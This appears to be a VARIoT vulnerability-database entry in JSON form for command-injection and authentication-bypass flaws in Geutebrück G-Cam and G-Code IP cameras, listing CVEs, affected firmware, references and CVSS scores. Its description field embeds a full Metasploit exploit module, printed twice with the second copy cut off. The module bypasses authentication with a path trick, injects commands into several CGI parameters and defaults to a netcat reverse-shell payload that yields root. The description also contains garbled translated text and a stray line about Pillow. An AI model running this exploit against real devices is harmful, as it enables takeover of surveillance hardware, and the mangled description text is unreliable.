            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 2.3,
            "url": "http://packetstormsecurity.com/files/164191/geutebruck-instantrec-remote-command-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33549"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "date": "2021-09-13T18:15:22.773000",
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "date": "2021-09-27T14:30:08.640000",
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0849

    Vulnerability from variot - Updated: 2025-01-30 20:38

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0849",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33553",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33553",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33553",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33553",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33553",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2083",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        